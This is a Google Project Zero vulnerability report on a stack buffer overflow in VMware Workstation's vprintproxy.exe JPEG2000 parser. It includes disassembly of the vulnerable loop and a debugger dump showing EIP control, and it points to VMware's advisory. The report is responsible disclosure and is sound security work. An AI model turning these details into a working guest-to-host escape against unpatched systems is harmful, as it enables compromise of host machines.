|
|
VMware Workstation: vprintproxy.exe stack overflow when processing a JPEG2000 | |||||
| Project Member Reported by kost...@google.com, Mar 11 2015 | Back to list | |||||
Version: VMware Workstation 11.1 Host Platform: Windows 8.1 amd64 Summary: Printer virtualization under VMware Workstation involves a vprintproxy.exe process launched by vmware-vmx.exe on the Host. It will receive and process EMFSPOOL files sent by a Guest on its COM1 port, if a virtual printer has been added to the VM hardware (default). Several vulnerabilities in this component allow an unprivileged Guest user to execute code on the Host. Description: This vulnerability looks conspicuously like CVE-2012-0897, and it might very well be that the same JPEG2000 library was used in both case but has been left unpatched in TPView.dll for the last couple of years. Anyway, when processing record 0xff5c (Quantization Default), a user can trigger an overflow of a stack buffer in a function without a stack cookie - which leads to direct EIP control. .text:10048788 8D 7C 24 3C lea edi, [esp+100h+var_C4] .text:1004878C .text:1004878C loc_1004878C: ; CODE XREF: JP2_0FF5Ch+128j .text:1004878C 8B 4C 24 14 mov ecx, [esp+100h+var_EC] .text:10048790 8B 54 24 1C mov edx, [esp+100h+var_E4] .text:10048794 51 push ecx .text:10048795 57 push edi .text:10048796 52 push edx .text:10048797 E8 C4 43 00 00 call kk_JP2_ReadWord ; arg_4=&result .text:1004879C 83 C4 0C add esp, 0Ch .text:1004879F 85 C0 test eax, eax .text:100487A1 0F 85 5E 02 00 00 jnz loc_10048A05 .text:100487A7 8B 44 24 14 mov eax, [esp+100h+var_EC] .text:100487AB 83 C7 02 add edi, 2 .text:100487AE 83 C0 02 add eax, 2 .text:100487B1 45 inc ebp .text:100487B2 3B EB cmp ebp, ebx .text:100487B4 89 44 24 14 mov [esp+100h+var_EC], eax .text:100487B8 7C D2 jl short loc_1004878C .text:100487BA E9 B8 00 00 00 jmp loc_10048877 Here, the JPEG2000 parser will just read words as long as the size of the 0xff5c record permits it, while the destination buffer can only hold 0xc4 bytes at most. This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
,
Mar 11 2015
,
Jun 2 2015
,
Jun 2 2015
,
Jun 9 2015
,
Jun 9 2015
,
Jun 9 2015
VMware advisory VMSA-2015-0004: https://www.vmware.com/security/advisories/VMSA-2015-0004.html
,
Jan 13 2016
very smart software its running fast... |
||||||
| ► Sign in to add a comment | ||||||
Sample dump, demonstrating eip control: 0:013:x86> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* FAULTING_IP: unknown!noop+0 42424242 ?? ??? EXCEPTION_RECORD: ffffffffffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 0000000042424242 ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 0000000000000008 Parameter[1]: 0000000042424242 Attempt to execute non-executable address 0000000042424242 CONTEXT: 0000000000000000 -- (.cxr 0x0;r) eax=00000000 ebx=0e7cdba0 ecx=00000037 edx=0e6feea4 esi=00000037 edi=0b178690 eip=42424242 esp=0e6fee6c ebp=0e7cff5c iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 42424242 ?? ??? FAULTING_THREAD: 0000000000001024 PROCESS_NAME: vprintproxy.exe ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s. EXCEPTION_PARAMETER1: 0000000000000008 EXCEPTION_PARAMETER2: 0000000042424242 WRITE_ADDRESS: 0000000042424242 FOLLOWUP_IP: unknown!noop+0 42424242 ?? ??? FAILED_INSTRUCTION_ADDRESS: unknown!noop+0 42424242 ?? ??? NTGLOBALFLAG: 2000000 APPLICATION_VERIFIER_FLAGS: 0 APP: vprintproxy.exe ANALYSIS_VERSION: 6.3.9600.17298 (debuggers(dbg).141024-1500) amd64fre IP_ON_HEAP: 0000000042424242 The fault address in not in any loaded module, please check your build's rebase log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may contain the address if it were loaded. IP_IN_FREE_BLOCK: 42424242 BUGCHECK_STR: APPLICATION_FAULT_SOFTWARE_NX_FAULT_INVALID_ZEROED_STACK PRIMARY_PROBLEM_CLASS: SOFTWARE_NX_FAULT_INVALID DEFAULT_BUCKET_ID: SOFTWARE_NX_FAULT_INVALID STACK_TEXT: WARNING: Frame IP not in any known module. Following frames may be wrong. 0e6fee68 43434343 44444444 45454545 0e6feea4 0x42424242 0e6feea4 0b171883 0e7cff5c 0e6feec4 00000000 0x43434343 0e6feed4 0b15265e 0e6fef18 0b1527ce 00000000 TPView!JP2_Decompress_Start+0x353 0e6fef2c 0b15fb0e 00000001 0e7a9ff8 42424242 TPView+0x2265e 0e6fef30 00000000 0e7a9ff8 42424242 0b35dcd0 TPView!TPRenderW+0x1e70 STACK_COMMAND: .cxr 0x0 ; kb SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: unknown!noop+0 FOLLOWUP_NAME: MachineOwner MODULE_NAME: unknown IMAGE_NAME: unknown DEBUG_FLR_IMAGE_TIMESTAMP: 0 FAILURE_BUCKET_ID: SOFTWARE_NX_FAULT_INVALID_c0000005_unknown!noop BUCKET_ID: APPLICATION_FAULT_SOFTWARE_NX_FAULT_INVALID_ZEROED_STACK_BAD_IP_unknown!noop+0 ANALYSIS_SOURCE: UM FAILURE_ID_HASH_STRING: um:software_nx_fault_invalid_c0000005_unknown!noop FAILURE_ID_HASH: {89fd3157-762b-6f3b-1bc7-04be4535c89a} Followup: MachineOwner ---------